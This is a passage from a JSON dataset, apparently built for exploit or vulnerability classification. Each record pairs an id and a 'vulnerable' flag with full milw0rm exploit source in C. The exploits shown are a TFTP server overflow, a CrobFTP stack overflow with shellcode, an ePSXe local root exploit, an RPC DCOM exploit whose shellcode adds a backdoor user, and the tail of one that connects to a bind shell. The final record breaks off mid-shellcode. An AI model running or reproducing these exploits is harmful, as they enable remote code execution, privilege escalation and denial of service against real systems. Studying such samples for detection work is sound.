INVALID_SOCKET)\n\n\t\t{\n\n\t\t\tprintf(\"Invalid socket return in socket() call.\\n\");\n\n\t\t\tWSACleanup();\n\n\t\t\treturn -1;\n\n\t\t}\n\n\n\n\t\tsin.sin_family = AF_INET;\n\n\t\tsin.sin_port = htons(2001);\n\n\t\tsin.sin_addr.s_addr = inet_addr(argv[3]);\n\n\n\n\t\tif(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)\n\n\t\t{\n\n\t\t\tprintf(\"Exploit Failed. SOCKET_ERROR return in connect call.\\n\");\n\n\t\t\tclosesocket(sock);\n\n\t\t\tWSACleanup();\n\n\t\t\treturn -1;\n\n\t\t}\n\n\t\t\n\n\t\tprintf(\"[+] Exploit successful!\\n\\n\");\n\n\t\tshell(sock);\n\n\t\tclosesocket(sock);\t\n\n\t}\n\n\telse\n\n\t{\n\n\t\tprintf(\"[-] Cannot connect!\\n\");\n\n\t}\n\n\n\n\tclosesocket(s);\n\n\tWSACleanup();\n\n\n\n\treturn 0;\n\n}\n\n\n\n// milw0rm.com [2005-06-02]",
155        "vulnerable": true
156    },
157    {
158        "exploit_id": 1027,
159        "content": "/*\n\n*\n\n* FutureSoft TFTP Server 2000 Remote Denial of Service Exploit\n\n* http://www.futuresoft.com/products/lit-tftp2000.htm\n\n* Bug Discovered by SIG^2 (http://www.security.org.sg)\n\n* Exploit coded By ATmaCA\n\n* Web: atmacasoft.com && spyinstructors.com\n\n* E-Mail: atmaca@icqmail.com\n\n* Credit to kozan\n\n* Usage:tftp_exp <targetIp> [targetPort]\n\n*\n\n*/\n\n\n\n/*\n\n*\n\n* Vulnerable Versions:\n\n* TFTP Server 2000 Evaluation Version 1.0.0.1\n\n*\n\n*/\n\n\n\n#include <windows.h>\n\n#include <stdio.h>\n\n\n\n#pragma comment(lib, \"ws2_32.lib\")\n\n\n\n/* |RRQ|AAAAAAAAAAAAAAAA....|NULL|netasc|NULL| */\n\nchar expbuffer[] =\n\n\"\\x00\\x01\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x58\\x58\\x58\\x58\" /* EIP */\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\\x00\\x6E\\x65\\x74\\x61\\x73\\x63\\x69\"\n\n\"\\x69\\x00\";\n\n\n\nvoid main(int argc, char *argv[])\n\n{\n\n        WSADATA wsaData;\n\n        WORD wVersionRequested;\n\n        struct hostent *pTarget;\n\n        struct sockaddr_in sock;\n\n        SOCKET mysocket;\n\n        int destPORT = 69;//Default to 69\n\n\n\n        if (argc < 2){\n\n                printf(\"FutureSoft TFTP Server 2000 Remote Denial of Service Exploit\\n\");\n\n                printf(\"http://www.futuresoft.com/products/lit-tftp2000.htm\\n\");\n\n                printf(\"Bug Discovered by SIG^2 (http://www.security.org.sg)\\n\");\n\n                printf(\"Exploit coded By ATmaCA\\n\");\n\n                printf(\"Web: atmacasoft.com && spyinstructors.com\\n\");\n\n                printf(\"E-Mail: atmaca@icqmail.com\\n\");\n\n                printf(\"Credit to kozan\\n\");\n\n                printf(\"Usage:tftp_exp <targetIp> [targetPort]\\n\");\n\n                return;\n\n        }\n\n        if (argc==3)\n\n                destPORT=atoi(argv[2]);\n\n\n\n        printf(\"Requesting Winsock...\\n\");\n\n        wVersionRequested = MAKEWORD(1, 1);\n\n        if (WSAStartup(wVersionRequested, &wsaData) < 0) {\n\n                printf(\"No winsock suitable version found!\");\n\n                return;\n\n        }\n\n        mysocket = socket(AF_INET, SOCK_DGRAM\t, 0);\n\n        if(mysocket==INVALID_SOCKET){\n\n                printf(\"Can't create UDP socket\\n\");\n\n                exit(1);\n\n        }\n\n        printf(\"Resolving Hostnames...\\n\");\n\n        if ((pTarget = gethostbyname(argv[2])) == NULL){\n\n                printf(\"Resolve of %s failed\\n\", argv[1]);\n\n                exit(1);\n\n        }\n\n        memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);\n\n        sock.sin_family = AF_INET;\n\n        sock.sin_port = htons(destPORT);\n\n\n\n        printf(\"Connecting...\\n\");\n\n        if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){\n\n                printf(\"Couldn't connect to host.\\n\");\n\n                exit(1);\n\n        }\n\n\n\n        printf(\"Connected!...\\n\");\n\n        Sleep(10);\n\n\n\n        printf(\"RRQ->Sending packet. Size: %d\\n\",sizeof(expbuffer));\n\n        if (send(mysocket,expbuffer, sizeof(expbuffer)+1, 0) == -1){\n\n                printf(\"Error sending packet\\n\");\n\n                closesocket(mysocket);\n\n                exit(1);\n\n        }\n\n        printf(\"Packet sent........\\n\");\n\n        printf(\"Success.\\n\");\n\n\n\n        closesocket(mysocket);\n\n        WSACleanup();\n\n}\n\n\n\n// milw0rm.com [2005-06-02]",
160        "vulnerable": true
161    },
162    {
163        "exploit_id": 1028,
164        "content": "/*\n\n * CrobFTP remote stack overflow PoC \n\n * ---------------------------------\n\n * Tested on Crob FTP Server 3.6.1, Windows XP\n\n * \n\n * Coded by Leon Juranic <ljuranic@lss.hr>\n\n * LSS Security / http://security.lss.hr\n\n *\n\n */\n\n\n\n\n\n\n\n#include <stdio.h>\n\n#include <windows.h>\n\n#include <time.h>\n\n\n\n#pragma comment (lib,\"ws2_32\")\n\n\n\n\n\nchar *fzz_recv (int sock)\n\n{\n\n\tfd_set fds;\n\n\tstruct timeval tv;\n\n\tstatic char buf[10000];\n\n\tchar *ptr=buf;\n\n\tint n;\n\n\ttv.tv_sec = 5;\n\n\ttv.tv_usec = 0;\n\n\n\n\tFD_ZERO(&fds);\n\n\tFD_SET(sock,&fds);\n\n\tif (select(NULL,&fds,NULL,NULL,&tv) != 0) {\n\n\t\tif (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0);\n\n\t\tbuf[n-1] = '\\0';\n\n\t\tprintf (\"RECV: %s\\n\",buf);\n\n\t\treturn buf;\n\n\t}\n\n\telse {\n\n\t\treturn NULL;\n\n\t}\n\n\t\n\n}\n\n\t\n\n\n\n\n\n\n\nint login (int sock, char *user, char *pass)\n\n{\n\n\tchar buf[1024], *bla;\n\n\tbla=fzz_recv(sock);\n\n\tprintf (\"recv: %s\\n\",bla);\n\n\tsprintf (buf,\"USER %s\\r\\n\",user);\n\n\tsend (sock,buf,strlen(buf),0);\n\n\tbla=fzz_recv(sock);\n\n\tprintf (\"recv: %s\\n\",bla);\n\n\tsprintf (buf,\"PASS %s\\r\\n\",pass);\n\n\tsend (sock,buf,strlen(buf),0);\n\n\tbla=fzz_recv(sock);\n\n\tprintf (\"recv: %s\\n\",bla);\n\n\tif (strcmp(\"230\",bla) != NULL)\n\n\t\treturn 0;\n\n\telse return -1;\n\n\treturn 0;\n\n}\n\n\n\n\n\n\n\n\n\nvoid lame_sploit (char *pack, char *user, char *pass)\n\n{\n\n\tWORD wVersionRequested;\n\n\tWSADATA wsaData;\n\n\tint sock, err,x;\n\n\tstruct sockaddr_in sin;\n\n\tchar buf[2000],tmp[1000];\n\n\t\n\n\n\n\tchar *shell=\t\t\t\t// 5 min. XP SP1 shellcode\n\n\t\t\"\\x33\\xc0\"\t\t\t\t// xor eax,eax\n\n\t\t\"\\x50\"\t\t\t\t\t// push eax (\\0)\n\n\t\t\"\\x68\\x2e\\x65\\x78\\x65\"  // push '.exe'\n\n\t\t\"\\x68\\x63\\x61\\x6c\\x63\"  // push 'calc'\n\n\t\t\"\\x54\"\t\t\t\t\t// push esp\n\n\t\t\"\\xba\\x44\\x80\\xc2\\x77\"  // mov  edx, 77c28044\n\n\t\t\"\\xff\\xd2\";\t\t\t\t// call edx  (system)\n\n\n\n\n\n\twVersionRequested = MAKEWORD( 2, 2 );\n\n\terr = WSAStartup( wVersionRequested, &wsaData );\n\n\tif ( err != 0 ) {\n\n\t\tprintf (\"ERROR: Sorry, cannot create socket!!!\\n\");\n\n\t\tExitProcess(-1);\n\n\t}\n\n\n\n\tsock=socket(AF_INET,SOCK_STREAM,0);\n\n\t\n\n\n\n\tsin.sin_family=AF_INET;\n\n\tsin.sin_addr.s_addr = inet_addr(pack);\n\n\tsin.sin_port = htons(21);\n\n\t\n\n\tif (connect(sock,(struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {\n\n\t\tprintf (\"CONNECT :(((\\n\");\n\n\t\tExitProcess(-1);\n\n\t}\n\n\n\n\tif (login(sock,user,pass) == -1)\n\n\t{\n\n\t\tprintf (\"ERROR: Cannot login to FTP server, sorry!!!\\n\");\n\n\t\texit(-1);\n\n\t}\n\n\t\n\n\tmemset(tmp,0,sizeof(tmp));\n\n\tmemset (tmp,0x90,180);\n\n\n\n\n\n\tmemcpy (&tmp[80],shell,strlen(shell));\n\n\t*(long*)&tmp[158] = 0x77da52b8; // EIP -> ret into 'jmp esp'\n\n\t*(long*)&tmp[166] = 0x74ec8390; //\t\t  sub esp,0x74\n\n\t*(long*)&tmp[170] = 0x9090e4ff; //\t\t  jmp esp\n\n\n\n\n\n\t_snprintf (buf,sizeof(buf),\"STOR %s\\r\\n\", tmp);\n\n\n\n\tprintf (\"DEBUG: %.30s %d\\n\",buf,strlen(buf));\n\n\tsend (sock,buf,strlen(buf),0);\n\n\tprintf (\"%s\\n\",fzz_recv(sock));\n\n\n\n\tstrcpy(buf,\"RMD \");\n\n\tfor (x=0;x<276;x++)\n\n\t\tstrcat (buf,\".../\");\n\n\tstrcat(buf,\"\\r\\n\");\n\n\n\n\tprintf (\"Sending exploit strings\\n\");\n\n\tsend (sock,buf,strlen(buf),0);\n\n\tprintf (\"recv: %s\\n\",fzz_recv(sock));\n\n\n\n\n\n}\n\n\n\n\n\n\n\nmain (int argc, char **argv)\n\n{\n\n\tprintf (\"CrobFTP Stack overflow PoC \\n\"\n\n\t\t    \"Coded by Leon Juranic <ljuranic@lss.hr>\\n\"\n\n\t\t\t\"LSS Security / http://security.lss.hr/\\n\");\n\n\n\n\tif (argc < 4 ) {\n\n\t\tprintf (\"\\nusage: %s <target_IP> <user> <pass>\\n\",argv[0]);\n\n\t\texit(-1);\n\n\t}\n\n\tlame_sploit(argv[1],argv[2],argv[3]);\n\n\n\n}\n\n\n\n// milw0rm.com [2005-06-03]",
165        "vulnerable": true
166    },
167    {
168        "exploit_id": 1029,
169        "content": "/* epsxe-e.c\n\n           ePSXe v1.* local exploit\n\nBy: Qnix\n\ne-mail: q-nix[at]hotmail[dot]com\n\nePSXe-website: www.epsxe.com\n\n\n\nEXP-Sample:\n\n\n\nroot@Qnix:~/epsxe# gcc -o epsxe-e epsxe-e.c\n\nroot@Qnix:~/epsxe# ./epsxe-e\n\n\n\n*************************************\n\n      ePSXe v1.* local exploit\n\n                 by\n\n   Qnix  | Q-nix[at]hotmail[dot]com\n\n*************************************\n\n\n\n[~] Stack pointer (ESP) : 0xbffff568\n\n[~] Offset from ESP     : 0x0\n\n[~] Desired Return Addr : 0xbffff568\n\n\n\n* Running ePSXe emulator version 1.6.0.\n\n* Memory handlers init.\n\nsh-2.05b# id\n\nuid=0(root) gid=0(root) \n\ngroups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)\n\n\n\n\n\n\n\n\n\n*/\n\n\n\n\n\n#include <stdlib.h>\n\n\n\nchar shellcode[] =\n\n\"\\x31\\xc0\\xb0\\x46\\x31\\xdb\\x31\\xc9\\xcd\\x80\\xeb\\x16\\x5b\\x31\\xc0\"\n\n\"\\x88\\x43\\x07\\x89\\x5b\\x08\\x89\\x43\\x0c\\xb0\\x0b\\x8d\\x4b\\x08\\x8d\"\n\n\"\\x53\\x0c\\xcd\\x80\\xe8\\xe5\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\"\n\n\"\\x68\";\n\n\n\nunsigned long sp(void)\n\n{ __asm__(\"movl %esp, %eax\");}\n\n\n\nint main(int argc, char *argv[])\n\n{\n\n   int i, offset;\n\n   long esp, ret, *addr_ptr;\n\n   char *buffer, *ptr;\n\n\n\n   offset = 0;\n\n   esp = sp();\n\n   ret = esp - offset;\n\n\n\nprintf(\"\\n ************************************* \\n\");\n\nprintf(\"      ePSXe v1.* local exploit          \\n\");\n\nprintf(\"                 by                  \\n\");\n\nprintf(\"   Qnix  | Q-nix[at]hotmail[dot]com   \");\n\nprintf(\"\\n ************************************* \\n\\n\");\n\nprintf(\"[~] Stack pointer (ESP) : 0x%x\\n\", esp);\n\nprintf(\"[~] Offset from ESP     : 0x%x\\n\", offset);\n\nprintf(\"[~] Desired Return Addr : 0x%x\\n\\n\", ret);\n\n\n\nbuffer = malloc(600);\n\n\n\nptr = buffer;\n\naddr_ptr = (long *) ptr;\n\nfor(i=0; i < 600; i+=4)\n\n{ *(addr_ptr++) = ret; }\n\n\n\nfor(i=0; i < 200; i++)\n\n{ buffer[i] = '\\x90'; }\n\n\n\nptr = buffer + 200;\n\nfor(i=0; i < strlen(shellcode); i++)\n\n{ *(ptr++) = shellcode[i]; }\n\n\n\nbuffer[600-1] = 0;\n\n\n\nexecl(\"./epsxe\", \"epsxe\", \"-nogui\", buffer, 0);\n\n\n\nfree(buffer);\n\n\n\n   return 0;\n\n}\n\n\n\n// milw0rm.com [2005-06-04]",
170        "vulnerable": true
171    },
172    {
173        "exploit_id": 103,
174        "content": "/*\n\n        RPCDCOM2.c  ver1.1\n\n        copy by FLASHSKY flashsky at xfocus.org  2003.9.14\n\n   */\n\n#include <stdio.h>\n\n#include <winsock2.h>\n\n#include <windows.h>\n\n#include <process.h>\n\n#include <string.h>\n\n#include <winbase.h>\n\n\n\nunsigned char bindstr[]={\n\n0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,\n\n0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,\n\n0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,\n\n0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,\n\n0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};\n\n\n\nunsigned char request1[]={\n\n0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03\n\n,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00\n\n,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45\n\n,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E\n\n,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D\n\n,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41\n\n,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00\n\n,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45\n\n,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00\n\n,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29\n\n,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00\n\n,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00\n\n,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10\n\n,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF\n\n,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10\n\n,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09\n\n,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00\n\n,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00\n\n,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00\n\n,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00\n\n,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00\n\n,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E\n\n,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00\n\n,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00\n\n,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00\n\n,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00\n\n,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00};\n\n\n\nunsigned char request2[]={\n\n0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00\n\n,0x00,0x00,0x5C,0x00,0x5C,0x00};\n\n\n\nunsigned char request3[]={\n\n0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00,\n\n0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00\n\n,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00\n\n,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00\n\n,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};\n\n\n\n\n\n\n\nunsigned char sccnsp3sp4[]=\n\n    \"\\x6C\\x00\\x6F\\x00\\x63\\x00\\x61\\x00\\x6C\\x00\\x68\\x00\"\n\n    \"\\x6F\\x00\\x73\\x00\\x74\\x00\\x5C\\x00\\x43\\x00\\x24\\x00\\x5C\\x00\"\n\n\n\n    \"\\x58\\x00\\xeb\\x3c\\x46\\x00\\x46\\x00\\xeb\\x7c\\x46\\x00\\x46\\x00\\x38\\x6e\"\n\n    \"\\xeb\\x02\\xeb\\x05\\xe8\\xf9\\xff\\xff\\xff\\x58\\x83\\xc0\\x1b\\x8d\\xa0\\x01\"\n\n    \"\\xeb\\x1e\\xff\\x83\\xe4\\xfc\\x8b\\xec\\x33\\xc9\\x66\\xb9\\x99\\x01\\x80\\x30\"\n\n    \"\\xf6\\xe0\\xe0\\x93\\xdf\\xfc\\xf2\\xf7\\xeb\\x06\\xf1\\xe1\\xf2\\xe1\\xea\\xd2\"    \n\n\n\n//SHELLCODE From  SAM ,THANKs !\n\n//Add user SST,password is 557,\n\n\"\\xEB\\x10\\x5A\\x4A\\x33\\xC9\\x66\\xB9\\x4D\\x01\\x80\\x34\\x0A\\x99\\xE2\\xFA\"\n\n\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\"\n\n\n\n\"\\x70\\xDA\\x98\\x99\\x99\\xCC\\x12\\x75\\x18\\x75\\x19\\x99\\x99\\x99\\x12\\x6D\"\n\n\"\\x71\\x92\\x98\\x99\\x99\\x10\\x9F\\x66\\xAF\\xF1\\x01\\x67\\x13\\x97\\x71\\x3C\"\n\n\"\\x99\\x99\\x99\\x10\\xDF\\x95\\x66\\xAF\\xF1\\xE7\\x41\\x7B\\xEA\\x71\\x0F\\x99\"\n\n\"\\x99\\x99\\x10\\xDF\\x89\\xFD\\x38\\x81\\x99\\x99\\x99\\x12\\xD9\\xA9\\x14\\xD9\"\n\n\"\\x81\\x22\\x99\\x99\\x8E\\x99\\x10\\x81\\xAA\\x59\\xC9\\xF3\\xFD\\xF1\\xB9\\xB6\"\n\n\"\\xF8\\xFD\\xF1\\xB9\\xEA\\xEA\\xED\\xF1\\xEC\\xEA\\xFC\\xEB\\xF1\\xF7\\xFC\\xED\"\n\n\"\\xB9\\x12\\x55\\xC9\\xC8\\x66\\xCF\\x95\\xAA\\x59\\xC9\\xF1\\xB9\\xAC\\xAC\\xAE\"\n\n\"\\xF1\\xB9\\xEA\\xEA\\xED\\xF1\\xEC\\xEA\\xFC\\xEB\\xF1\\xF7\\xFC\\xED\\xB9\\x12\"\n\n\"\\x55\\xC9\\xC8\\x66\\xCF\\x95\\xAA\\x59\\xC9\\xF1\\xFD\\xFD\\x99\\x99\\xF1\\xED\"\n\n\"\\xB9\\xB6\\xF8\\xF1\\xEA\\xB9\\xEA\\xEA\\xF1\\xF8\\xED\\xF6\\xEB\\xF1\\xF0\\xEA\"\n\n\"\\xED\\xEB\\xF1\\xFD\\xF4\\xF0\\xF7\\xF1\\xEC\\xE9\\xB9\\xF8\\xF1\\xF5\\xFE\\xEB\"\n\n\"\\xF6\\xF1\\xF5\\xF6\\xFA\\xF8\\xF1\\xF7\\xFC\\xED\\xB9\\x12\\x55\\xC9\\xC8\\x66\"\n\n\"\\xCF\\x95\\xAA\\x59\\xC9\\x66\\xCF\\x89\\xCA\\xCC\\xCF\\xCE\\x12\\xF5\\xBD\\x81\"\n\n\"\\x12\\xDC\\xA5\\x12\\xCD\\x9C\\xE1\\x9A\\x4C\\x12\\xD3\\x81\\x12\\xC3\\xB9\\x9A\"\n\n\"\\x44\\x7A\\xAB\\xD0\\x12\\xAD\\x12\\x9A\\x6C\\xAA\\x66\\x65\\xAA\\x59\\x35\\xA3\"\n\n\"\\x5D\\xED\\x9E\\x58\\x56\\x94\\x9A\\x61\\x72\\x6B\\xA2\\xE5\\xBD\\x8D\\xEC\\x78\"\n\n\"\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\\x9A\\x44\\x12\\x9D\"\n\n\"\\x12\\x9A\\x5C\\x72\\x9B\\xAA\\x59\\x12\\x4C\\xC6\\xC7\\xC4\\xC2\\x5B\\x9D\\x99\"\n\n\"\\xCC\\xCF\\xFD\\x38\\xA9\\x99\\x99\\x99\\x1C\\x59\\xE1\\x95\\x12\\xD9\\x95\\x12\"\n\n\"\\xE9\\x85\\x34\\x12\\xF1\\x91\\